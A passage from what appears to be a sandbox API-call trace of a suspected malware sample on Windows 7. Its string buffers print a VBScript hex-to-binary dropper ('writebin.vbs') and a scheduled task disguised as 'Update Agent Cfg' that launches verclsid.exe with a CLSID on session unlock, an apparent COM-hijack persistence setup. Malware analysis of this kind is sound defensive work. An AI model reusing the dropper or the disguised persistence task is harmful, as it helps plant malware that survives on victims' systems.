[0376.295] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff449b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e828) returned 0x0
[0376.300] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e828, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.300] ITypeInfo:GetRefTypeInfo (in: This=0x30e828, hreftype=0xfffffffe, ppTInfo=0xfff4d638 | out: ppTInfo=0xfff4d638*=0x30e880) returned 0x0
[0376.300] IUnknown:Release (This=0x30e828) returned 0x1
[0376.300] ??2@YAPEAX_K@Z () returned 0xf58c0
[0376.300] SafeArrayPutElement (psa=0x307570, rgIndices=0x20e9e8, pv=0x20e998) returned 0x0
[0376.300] SafeArrayPutElement (psa=0x307570, rgIndices=0x20e9e8, pv=0x20e998) returned 0x0
[0376.300] ??2@YAPEAX_K@Z () returned 0xf5960
[0376.301] ??2@YAPEAX_K@Z () returned 0xf59c0
[0376.301] SafeArrayPutElement (psa=0x307670, rgIndices=0x20e988, pv=0x20e928) returned 0x0
[0376.301] SafeArrayPutElement (psa=0x307670, rgIndices=0x20e988, pv=0x20e928) returned 0x0
[0376.301] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e8d8) returned 0x0
[0376.301] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e8d8, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.301] ITypeInfo:GetRefTypeInfo (in: This=0x30e8d8, hreftype=0xfffffffe, ppTInfo=0xfff4d6b8 | out: ppTInfo=0xfff4d6b8*=0x30e930) returned 0x0
[0376.301] IUnknown:Release (This=0x30e8d8) returned 0x1
[0376.301] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30e988) returned 0x0
[0376.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x30e988, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.302] ITypeInfo:GetRefTypeInfo (in: This=0x30e988, hreftype=0xfffffffe, ppTInfo=0xfff4d6f8 | out: ppTInfo=0xfff4d6f8*=0x30e9e0) returned 0x0
[0376.302] IUnknown:Release (This=0x30e988) returned 0x1
[0376.302] ITypeLib:GetTypeInfoOfGuid (in: This=0x30d440, GUID=0xfff44e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x20e9d8 | out: ppTInfo=0x20e9d8*=0x30ea38) returned 0x0
[0376.302] ITypeInfo:GetRefTypeOfImplType (in: This=0x30ea38, index=0xffffffff, pRefType=0x20e9d0 | out: pRefType=0x20e9d0*=0xfffffffe) returned 0x0
[0376.302] ITypeInfo:GetRefTypeInfo (in: This=0x30ea38, hreftype=0xfffffffe, ppTInfo=0xfff4d678 | out: ppTInfo=0xfff4d678*=0x30ea90) returned 0x0
[0376.302] IUnknown:Release (This=0x30ea38) returned 0x1
[0376.302] IUnknown:Release (This=0x30d440) returned 0x4
[0376.302] ??2@YAPEAX_K@Z () returned 0xf5a20
[0376.302] GetCurrentThreadId () returned 0xc3c
[0376.302] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8
[0376.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xfff323e8, lpParameter=0xf5a20, dwCreationFlags=0x0, lpThreadId=0xf5a48 | out: lpThreadId=0xf5a48*=0xc44) returned 0xe0
[0376.304] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x20ec30*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
[0376.322] CloseHandle (hObject=0xd8) returned 1
[0376.322] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", nBufferLength=0x104, lpBuffer=0x20ecc0, lpFilePart=0x20ecb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs", lpFilePart=0x20ecb0*="writebin.vbs") returned 0x31
[0376.322] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x20e1d0 | out: phkResult=0x20e1d0*=0xf2) returned 0x0
[0376.323] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x20e180, lpData=0x20e1e0, lpcbData=0x20e184*=0x800 | out: lpType=0x20e180*=0x1, lpData="VBSFile", lpcbData=0x20e184*=0x10) returned 0x0
[0376.323] RegCloseKey (hKey=0xf2) returned 0x0
[0376.323] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20e1d0 | out: phkResult=0x20e1d0*=0xf2) returned 0x0
[0376.324] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x20e180, lpData=0x20ea50, lpcbData=0x20e184*=0x200 | out: lpType=0x20e180*=0x1, lpData="VBScript", lpcbData=0x20e184*=0x12) returned 0x0
[0376.325] RegCloseKey (hKey=0xf2) returned 0x0
[0376.325] ??2@YAPEAX_K@Z () returned 0xf62b0
[0376.325] GetProcessHeap () returned 0x2e0000
[0376.325] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x2000) returned 0x317460
[0376.325] CLSIDFromString (in: lpsz="VBScript", pclsid=0x20e9c8 | out: pclsid=0x20e9c8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0
[0376.327] CoCreateInstance (in: rclsid=0x20e9c8*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xfff44828*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20e9c0 | out: ppv=0x20e9c0*=0xf65e0) returned 0x0
[0376.351] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20cbe0 | out: lpSystemTimeAsFileTime=0x20cbe0*(dwLowDateTime=0xf863b780, dwHighDateTime=0x1dab598))
[0376.351] GetCurrentProcessId () returned 0xc38
[0376.351] GetCurrentThreadId () returned 0xc3c
[0376.351] GetTickCount () returned 0x142654d
[0376.351] QueryPerformanceCounter (in: lpPerformanceCount=0x20cbe8 | out: lpPerformanceCount=0x20cbe8*=2125704879980) returned 1
[0376.353] malloc (_Size=0x100) returned 0xf6470
[0376.353] __dllonexit () returned 0x7fef787bfc0
[0376.353] __dllonexit () returned 0x7fef787bfa8
[0376.354] __dllonexit () returned 0x7fef787bfd4
[0376.355] GetUserDefaultLCID () returned 0x409
[0376.355] GetVersion () returned 0x1db10106
[0376.356] ??2@YAPEAX_K@Z () returned 0xf6580
[0376.357] ??2@YAPEAX_K@Z () returned 0xf65e0
[0376.358] GetUserDefaultLCID () returned 0x409
[0376.358] GetACP () returned 0x4e4
[0376.359] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6970
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6580
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6a50
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6a90
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6b60
[0376.360] GetCurrentThreadId () returned 0xc3c
[0376.360] ??2@YAPEAX_K@Z () returned 0xf6ba0
[0376.361] GetUserDefaultLCID () returned 0x409
[0376.361] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0376.361] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x20e920, cchData=6 | out: lpLCData="1252") returned 5
[0376.361] IsValidCodePage (CodePage=0x4e4) returned 1
[0376.363] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefdf10000
[0376.364] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoCreateInstance") returned 0x7fefdf37490
[0376.364] CoCreateInstance (in: rclsid=0x7fef78cd5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef78cd5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0xf6928 | out: ppv=0xf6928*=0x31e9a0) returned 0x0
[0376.364] IUnknown:AddRef (This=0x31e9a0) returned 0x2
[0376.364] GetCurrentProcessId () returned 0xc38
[0376.364] GetCurrentThreadId () returned 0xc3c
[0376.364] GetTickCount () returned 0x142655d
[0376.364] ISystemDebugEventFire:BeginSession (This=0x31e9a0, guidSourceID=0x7fef78cd5d8, strSessionName="VBScript:00003128:00003132:21128541") returned 0x0
[0376.364] GetCurrentThreadId () returned 0xc3c
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6c30
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6c80
[0376.365] malloc (_Size=0x80) returned 0xf6d80
[0376.365] malloc (_Size=0x108) returned 0xf6e10
[0376.365] memcpy (in: _Dst=0xf6e58, _Src=0x306648, _Size=0x10 | out: _Dst=0xf6e58) returned 0xf6e58
[0376.365] GetCurrentThreadId () returned 0xc3c
[0376.365] ??2@YAPEAX_K@Z () returned 0xf6f20
[0376.365] memcpy (in: _Dst=0xf6ea8, _Src=0x30c6f8, _Size=0x8 | out: _Dst=0xf6ea8) returned 0xf6ea8
[0376.366] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\writebin.vbs" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\writebin.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x10c
[0376.366] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee
[0376.366] CreateFileMappingA (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2ee, lpName=0x0) returned 0x110
[0376.366] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x230000
[0376.366] GetVersionExA (in: lpVersionInformation=0x20ead0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd9328b1, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x20ead0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.366] IsTextUnicode (in: lpv=0x230000, iSize=750, lpiResult=0x20eac0 | out: lpiResult=0x20eac0) returned 0
[0376.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with", cbMultiByte=750, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 750
[0376.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with", cbMultiByte=750, lpWideCharStr=0x31ea18, cchWideChar=750 | out: lpWideCharStr=" :::hx = replace(wscript.arguments(0),\" \",\"\")\r\n :::file = wscript.arguments(1)\r\n :::\r\n :::length = len(hx)/2 : if length mod 2 then hx = hx & \"00\"\r\n :::\r\n :::s = \"\"\r\n :::for i=1 to len(hx) step 4\r\n ::: s = s & chrW(clng(\"&H\" & mid(hx,i,2)) + clng(\"&H\" & mid(hx,i+2,2)) * 256)\r\n :::next\r\n :::\r\n :::typeBin = 1 : typeText = 2 : bOverwrite = 2\r\n :::with CreateObject(\"ADODB.Stream\")\r\n ::: .type = typeText : .open : .writeText s : .saveToFile file, bOverwrite : .close\r\n ::: .type = typeBin : .open : .loadFromFile file : .position = 2 : data = .read(length)\r\n ::: .position = 0 : .write data\r\n ::: .position = length : .setEOS\r\n ::: .saveToFile file, bOverwrite\r\n ::: .close\r\n :::end with") returned 750
[0376.367] UnmapViewOfFile (lpBaseAddress=0x230000) returned 1
[0376.389] CloseHandle (hObject=0x110) returned 1
[0376.389] CloseHandle (hObject=0x10c) returned 1
[0376.389] GetSystemDirectoryA (in: lpBuffer=0x20eb48, uSize=0x0 | out: lpBuffer="") returned 0x14
[0376.389] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.389] GetSystemDirectoryA (in: lpBuffer=0xf65b0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0376.389] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7feff870000
[0376.389] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferIdentifyLevel") returned 0x7feff88e470
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferComputeTokenFromLevel") returned 0x7feff88f9b0
[0376.390] GetProcAddress (hModule=0x7feff870000, lpProcName="SaferCloseLevel") returned 0x7feff88f660
[0376.390] IdentifyCodeAuthzLevelW () returned 0x1
[0376.513] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20dcc0 | out: lpSystemTimeAsFileTime=0x20dcc0*(dwLowDateTime=0xf87b8540, dwHighDateTime=0x1dab598))
[0376.513] GetCurrentProcessId () returned 0xc38
[0376.513] GetCurrentThreadId () returned 0xc3c
[0376.513] GetTickCount () returned 0x14265e9
[0376.513] QueryPerformanceCounter (in: lpPerformanceCount=0x20dcc8 | out: lpPerformanceCount=0x20dcc8*=2125721043309) returned 1
[0376.513] malloc (_Size=0x100) returned 0xf7710
[0376.514] GetVersionExA (in: lpVersionInformation=0x20daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xf784f810, dwBuildNumber=0x7fe, dwPlatformId=0xf7840000, szCSDVersion="þ\x07") | out: lpVersionInformation=0x20daa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.514] GetUserDefaultLCID () returned 0x409
[0376.514] IsFileSupportedName () returned 0x1
[0376.514] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0
[0376.527] GetSignedDataMsg () returned 0x0
[0376.527] GetCurrentProcess () returned 0xffffffffffffffff
[0376.527] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x110, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x20e2e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x20e2e0*=0x13c) returned 1
[0376.527] GetFileSize (in: hFile=0x13c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ee
[0376.527] ??2@YAPEAX_K@Z () returned 0xf9ae0
[0376.527] SetFilePointer (in: hFile=0x13c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
[0376.527] ReadFile (in: hFile=0x13c, lpBuffer=0xf9ae0, nNumberOfBytesToRead=0x2ee, lpNumberOfBytesRead=0x20e2c0, lpOverlapped=0x0 | out: lpBuffer=0xf9ae0*, lpNumberOfBytesRead=0x20e2c0*=0x2ee, lpOverlapped=0x0) returned 1
[0376.528] CoInitialize (pvReserved=0x0) returned 0x1
[0376.528] CoCreateInstance (in: rclsid=0x7fef784f850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef784f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x20e230 | out: ppv=0x20e230*=0xfa7b0) returned 0x0
[0376.546] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20c450 | out: lpSystemTimeAsFileTime=0x20c450*(dwLowDateTime=0xf8804800, dwHighDateTime=0x1dab598))
[0376.546] GetCurrentProcessId () returned 0xc38
[0376.546] GetCurrentThreadId () returned 0xc3c
[0376.546] GetTickCount () returned 0x1426609
[0376.546] QueryPerformanceCounter (in: lpPerformanceCount=0x20c458 | out: lpPerformanceCount=0x20c458*=2125724339501) returned 1
[0376.547] malloc (_Size=0x100) returned 0xf7820
[0376.547] __dllonexit () returned 0x7fef78014c0
[0376.547] __dllonexit () returned 0x7fef78014e8
[0376.547] GetVersionExA (in: lpVersionInformation=0x20c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf7802dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf78014e8, szCSDVersion="þ\x07") | out: lpVersionInformation=0x20c230*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0376.547] GetProcessWindowStation () returned 0x2c
[0376.548] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x20c218, nLength=0xc, lpnLengthNeeded=0x20c210 | out: pvInfo=0x20c218, lpnLengthNeeded=0x20c210) returned 1
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa3a0
[0376.548] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa3f0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa430
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa470
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa4b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa4f0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa530
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa570
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa5b0
[0376.548] ??2@YAPEAX_K@Z () returned 0xfa5f0
[0376.549] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.549] ??2@YAPEAX_K@Z () returned 0xfa640
[0376.549] ??2@YAPEAX_K@Z () returned 0xfa680
[0376.549] DllGetClassObject (in: rclsid=0x31d430*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x20cf00 | out: ppv=0x20cf00*=0x3edfb0) returned 0x0
[0376.550] memcpy (in: _Dst=0x20cd00, _Src=0xfa430, _Size=0x38 | out: _Dst=0x20cd00) returned 0x20cd00
[0376.550] ??2@YAPEAX_K@Z () returned 0x3edfb0
[0376.550] IClassFactory:CreateInstance (in: This=0x3edfb0, pUnkOuter=0x0, riid=0x20dce0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x20cf20 | out: ppvObject=0x20cf20*=0xfa7b0) returned 0x0
[0376.550] ??2@YAPEAX_K@Z () returned 0xfa6c0
[0376.550] GetSystemInfo (in: lpSystemInfo=0x20cd60 | out: lpSystemInfo=0x20cd60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06))
[0376.551] VirtualQuery (in: lpAddress=0x20cdd0, lpBuffer=0x20cd90, dwLength=0x30 | out: lpBuffer=0x20cd90*(BaseAddress=0x20c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0376.551] ??2@YAPEAX_K@Z () returned 0xf65b0
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa700
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa760
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa790
[0376.551] ??2@YAPEAX_K@Z () returned 0xfa840
[0376.551] IUnknown:AddRef (This=0xfa7b0) returned 0x2
[0376.551] IUnknown:Release (This=0xfa7b0) returned 0x1
[0376.551] IUnknown:Release (This=0x3edfb0) returned 0x0
[0376.552] ??3@YAXPEAX@Z () returned 0x61b5f601
[0376.552] IUnknown:QueryInterface (in: This=0xfa7b0, riid=0x7fef784f860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x20e168 | out: ppvObject=0x20e168*=0xfa7b0) returned 0x0
[0376.552] IUnknown:Release (This=0xfa7b0) returned 0x1
[0376.552] _strnicmp (_Str1=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1317
[0379.347] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", cbMultiByte=-1, lpWideCharStr=0x2b6128, cchWideChar=1317 | out: lpWideCharStr=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n") returned 1317
[0379.347] SysStringLen (param_1=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n") returned 0x524
[0379.347] VarBstrCat (in: bstrLeft=0x0, bstrRight=" \r\n \r\n \r\n2020-06-18T10:13:32.9293139 \r\nUpdate Agent Cfg \r\n\\Update_AgentConfig \r\n \r\n \r\n \r\nkEecfMwgj \r\n \r\n \r\n \r\ntrue \r\nSessionUnlock \r\nkEecfMwgj \r\n \r\n \r\n \r\n \r\nInteractiveToken \r\n \r\n \r\n \r\nIgnoreNew \r\nfalse \r\nfalse \r\n \r\nfalse \r\nfalse \r\n \r\ntrue \r\ntrue \r\nPT0S \r\n \r\n \r\n \r\n\"verclsid.exe\" \r\n/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} \r\n \r\n \r\n \r\n", pbstrResult=0xcc928 | out: pbstrResult=0xcc928) returned 0x0
[0379.349] free (_Block=0x1d5fd0)
[0379.349] CloseHandle (hObject=0xf4) returned 1
[0379.349] lstrlenW (lpString="") returned 0
[0379.350] malloc (_Size=0x18) returned 0x1d5b50
[0379.350] SysStringLen (param_1="") returned 0x0
[0379.350] free (_Block=0x1d5b50)
[0379.350] lstrlenW (lpString="") returned 0
